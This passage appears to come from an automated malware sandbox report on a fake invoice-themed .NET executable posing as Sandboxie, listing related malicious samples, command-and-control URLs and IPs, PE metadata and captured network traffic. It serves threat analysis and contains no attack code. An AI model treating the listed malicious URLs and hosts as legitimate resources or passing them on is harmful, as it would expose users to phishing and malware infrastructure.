                                              DOCUMENTO_OFICIAL.54524786078485858624_269.21560870.561007.07248.vbsGet hashmaliciousBrowse
                                              • shuacr.diretosdewashington.us/?1/
                                              C4IAMAXFkX.exeGet hashmaliciousBrowse
                                              • www.powellpromo.com/ud5f/?4h=7ngXgn2hy&2dCP3h=p0EAeSt3Yxi8RZyMZj81sewyj5w/wtT+o/omwTObT8CNDd/hiAYPKRHnG+370a8W1/WLYDfsOg==
                                              vbc.exeGet hashmaliciousBrowse
                                              • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                              euro slip.xlsxGet hashmaliciousBrowse
                                              • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                              Payment Slip.xlsxGet hashmaliciousBrowse
                                              • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                              Proforma invoice.pdf.exeGet hashmaliciousBrowse
                                              • www.faktnews.info/cnt4/?8pIpUZ=7nen/PM+DYgrTGiBwyakkR58oidieoK8BE0qheAqH1BPNYPZLyC480K4iyAQFzUja+3Y&i0=o4llyxzXofK
                                              Wire Trf.xlsxGet hashmaliciousBrowse
                                              • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                              jFf7hizcUo.exeGet hashmaliciousBrowse
                                              • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                              DHL SHIPMENT DELIVERY-PACKAGE-INV-AWB247634563576.exeGet hashmaliciousBrowse
                                              • www.99099888.com/n00q/?Ez=65Xe4Dzdhj1dWdjtGjawQ+ZAtAn1IVLIAuCyuLyBrpkklYGBqgihqb6486Bj6E+200gf&q8=k0DHR

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              checkip.dyndns.comRevised Proforma Invoice.exeGet hashmaliciousBrowse
                                              • 193.122.6.168
                                              ZHOU0422.exeGet hashmaliciousBrowse
                                              • 132.226.8.169
                                              img-000.exeGet hashmaliciousBrowse
                                              • 132.226.8.169
                                              Bahon Ltd Inquiry#20220412.exeGet hashmaliciousBrowse
                                              • 193.122.6.168
                                              KW05200000032220.exeGet hashmaliciousBrowse
                                              • 193.122.6.168
                                              Products Inquiries.exeGet hashmaliciousBrowse
                                              • 132.226.8.169
                                              jRzSg8vuKb.exeGet hashmaliciousBrowse
                                              • 193.122.130.0
                                              DhETQ6889l.exeGet hashmaliciousBrowse
                                              • 193.122.130.0
                                              PO_28001.exeGet hashmaliciousBrowse
                                              • 132.226.8.169
                                              Halkbank001.exeGet hashmaliciousBrowse
                                              • 193.122.130.0
                                              INVOICE.exeGet hashmaliciousBrowse
                                              • 132.226.8.169
                                              74403100002.xlsmGet hashmaliciousBrowse
                                              • 193.122.6.168
                                              Fl5JugGjR8.exeGet hashmaliciousBrowse
                                              • 132.226.247.73
                                              Swift Copy.exeGet hashmaliciousBrowse
                                              • 132.226.8.169
                                              Payment slip.exeGet hashmaliciousBrowse
                                              • 193.122.6.168
                                              rerwsr.exeGet hashmaliciousBrowse
                                              • 193.122.6.168
                                              Halkbank_Ekstre_20220327_073712_983787.pdf.exeGet hashmaliciousBrowse
                                              • 158.101.44.242
                                              SWIFT gelen mesaj bildirim- dekont.exeGet hashmaliciousBrowse
                                              • 158.101.44.242
                                              Ref-04122022115609.exeGet hashmaliciousBrowse
                                              • 132.226.8.169
                                              SC_223651.exeGet hashmaliciousBrowse
                                              • 158.101.44.242
                                              freegeoip.appRevised Proforma Invoice.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              ZHOU0422.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              img-000.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Bahon Ltd Inquiry#20220412.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              KW05200000032220.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              Products Inquiries.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              jRzSg8vuKb.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              DhETQ6889l.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              PO_28001.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              Halkbank001.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              INVOICE.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              74403100002.xlsmGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Swift Copy.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              Payment slip.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              rerwsr.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              Halkbank_Ekstre_20220327_073712_983787.pdf.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              SWIFT gelen mesaj bildirim- dekont.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              Ref-04122022115609.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              Phosphoric AcidPR 120006486PO 120008190.pdf.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Invoice.exeGet hashmaliciousBrowse
                                              • 188.114.97.7

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              ROOTLAYERNETNLSecuriteInfo.com.Variant.Strictor.270970.1301.exeGet hashmaliciousBrowse
                                              • 185.222.57.199
                                              OPOLTRANS 112022.docxGet hashmaliciousBrowse
                                              • 45.137.22.41
                                              Quotation-pdf______________________________________.exeGet hashmaliciousBrowse
                                              • 45.137.22.163
                                              2467864 _INV_pdf.exeGet hashmaliciousBrowse
                                              • 45.137.22.163
                                              conferma d'ordine 46574.exeGet hashmaliciousBrowse
                                              • 45.137.22.163
                                              factura proforma PI- PI04522 7486.exeGet hashmaliciousBrowse
                                              • 45.137.22.163
                                              PI- PI04522 74868.exeGet hashmaliciousBrowse
                                              • 45.137.22.163
                                              jDEnPXUI8C.exeGet hashmaliciousBrowse
                                              • 185.222.57.203
                                              gtrrrewre.vbsGet hashmaliciousBrowse
                                              • 185.222.57.209
                                              Datos bancarios.pdf.exeGet hashmaliciousBrowse
                                              • 185.222.57.182
                                              paymentcopy-pdf__________________________________.exeGet hashmaliciousBrowse
                                              • 45.137.22.163
                                              Paymentcopy-pdf___________________________________.exeGet hashmaliciousBrowse
                                              • 45.137.22.163
                                              Quote_PDF_Quotation AKPI 04-04-22,pdf.exeGet hashmaliciousBrowse
                                              • 45.137.22.122
                                              AIR CARGO BOARDING shipment MAWB 40608657504.exeGet hashmaliciousBrowse
                                              • 45.137.22.163
                                              VAE LIMITED PO 2ORD200031-1910319 Swift copy..exeGet hashmaliciousBrowse
                                              • 45.137.22.179
                                              Rpt47488747 & Invoice shipping doc.exeGet hashmaliciousBrowse
                                              • 45.137.22.179
                                              PI- PI04522748-pdf.exeGet hashmaliciousBrowse
                                              • 45.137.22.163
                                              Ordine di acquisto PO-JTT-00001018.exeGet hashmaliciousBrowse
                                              • 45.137.22.163
                                              Payment Copy,pdf.exeGet hashmaliciousBrowse
                                              • 45.137.22.122
                                              AD1-2001028L.exeGet hashmaliciousBrowse
                                              • 45.137.22.122
                                              CLOUDFLARENETUSRevised Proforma Invoice.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              ZHOU0422.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              img-000.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Bahon Ltd Inquiry#20220412.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              http://0kjrj.xyzGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              KW05200000032220.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              Products Inquiries.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              jRzSg8vuKb.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              DhETQ6889l.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              PO_28001.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              deluxemat-et Order.xlsxGet hashmaliciousBrowse
                                              • 162.159.134.233
                                              PO.xlsxGet hashmaliciousBrowse
                                              • 104.21.82.227
                                              Halkbank001.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              https://sk7hmvqac4.s3.us-south.objectstorage.softlayer.net/electrosynthetically/index.html?key=53fdcebf3db938ebf7c3227c19a54efc&redirect=https://www.amazon.comGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              Chamberlinarchitects.htmlGet hashmaliciousBrowse
                                              • 104.18.11.207
                                              INVOICE.exeGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              https://www.canva.com/design/DAE9r98Jzww/xEVYoKbWWxWzUN92Hs52vg/view?utm_content=DAE9r98Jzww&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousBrowse
                                              • 104.16.123.96
                                              Order 2 April 2022.xlsxGet hashmaliciousBrowse
                                              • 188.114.96.7
                                              TCPing_2.1.exeGet hashmaliciousBrowse
                                              • 104.18.88.101
                                              GUP6mU7klz.exeGet hashmaliciousBrowse
                                              • 23.227.38.74

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              54328bd36c14bd82ddaa0c04b25ed9adRevised Proforma Invoice.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              ZHOU0422.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              img-000.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Bahon Ltd Inquiry#20220412.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              KW05200000032220.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Products Inquiries.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              jRzSg8vuKb.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              DhETQ6889l.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              PO_28001.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Halkbank001.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              INVOICE.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              TCPing_2.1.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              https://drive.google.com/file/d/1sRnDQoYXTh1my3KfV3_QkD9ThW6_qx9M/view?usp=drive_webGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              gAw4QahhFW.dllGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Swift Copy.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Payment slip.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              rerwsr.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Nw PN #23069746XVNXH8W630HXFRATQH.vbsGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              Halkbank_Ekstre_20220327_073712_983787.pdf.exeGet hashmaliciousBrowse
                                              • 188.114.97.7
                                              SWIFT gelen mesaj bildirim- dekont.exeGet hashmaliciousBrowse
                                              • 188.114.97.7

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order confirmation 46574 -QT-04-0022.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1119
                                              Entropy (8bit):5.356708753875314
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                              MD5:3197B1D4714B56F2A6AC9E83761739AE
                                              SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                              SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                              SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                              Malicious:true
                                              Reputation:moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):3.691489485251356
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:order confirmation 46574 -QT-04-0022.exe
                                              File size:33280
                                              MD5:0da15373eabede8f52245ef830d312f9
                                              SHA1:c7781e33383a542bd029a0bda482a063cca4dd76
                                              SHA256:73d38ad110eb78ec1d1c3510f2508c514ded9d52ffc5a01210310c5f789392b0
                                              SHA512:3b19fffd5c7bb0ef453847299e0bee91b57647ac792147e6207f1dc68ee0dd39ba537635f27dc4387b8b4a2c9df62cd366c92aef8e09127f0f09b7b8a40650e4
                                              SSDEEP:384:l1wCqbyeffffffIAd02OP2HTeHfZMiZwj:l1XqDYAdOrMJ
                                              TLSH:0BE29503FF6DA0ABF7642FB744125341BF65A10AB422E70B5E113265FEA13C37D92629
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Tb.................*...V.......I... ...`....@.. ....................................@................................

                                              File Icon

                                              Icon Hash:0c17336941454103

                                              Static PE Info

                                              General

                                              Entrypoint:0x4049ee
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x6254E082 [Tue Apr 12 02:14:26 2022 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x49940x57.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x534c.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x29f40x2a00False0.456008184524data5.61738905452IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0x60000x534c0x5400False0.0983072916667data2.35918150894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xc0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x61300x4c28dBase IV DBT, blocks size 0, block length 16384, next free block index 40, next free block 16843008, next used block 257
                                              RT_GROUP_ICON0xad580x14data
                                              RT_VERSION0xad6c0x42cdata
                                              RT_MANIFEST0xb1980x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright 2020-2022 by David Xanatos (xanasoft.com)
                                              Assembly Version5.55.15.0
                                              InternalNameorder confirmation 46574 -QT-04-0022.exe
                                              FileVersion5.55.15.0
                                              CompanyNameSandboxie-Plus.com
                                              LegalTrademarks
                                              CommentsSandboxie Start
                                              ProductNameSandboxie
                                              ProductVersion5.55.15.0
                                              FileDescriptionSandboxie Start
                                              OriginalFilenameorder confirmation 46574 -QT-04-0022.exe

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 12, 2022 20:22:50.123163939 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.146488905 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.146610975 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.147593975 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.172700882 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.172758102 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.172825098 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.173552036 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.173594952 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.173624039 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.173682928 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.195760012 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.195816994 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.195856094 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.195897102 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.195907116 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.195928097 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.195955038 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.196381092 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.196441889 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.196501970 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.196546078 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.196552992 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.196584940 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.196595907 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.218926907 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.218982935 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219023943 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219063044 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219083071 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.219104052 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219135046 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.219145060 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219185114 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219197989 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.219224930 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219254017 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219274998 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.219291925 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219342947 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219386101 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219392061 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.219424009 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219464064 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219502926 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219513893 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.219543934 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219552040 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.219584942 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219610929 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.219662905 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.242671967 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.242724895 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.242764950 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.242794991 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.242805958 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.242846966 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.242860079 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.242887020 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.242928028 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.242966890 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.242995977 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.243009090 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243029118 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.243052006 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243091106 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243130922 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243170023 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243210077 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243249893 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243289948 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243331909 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243406057 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243443966 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243484974 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243514061 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243551970 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243592978 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243633032 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243676901 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243717909 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243757963 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243798018 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243838072 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243879080 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243918896 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243957996 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.243999004 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.244028091 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.245009899 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.245033979 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.245038986 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.245043039 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.245045900 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.245049953 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.245053053 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.245055914 CEST4973880192.168.2.445.137.22.163
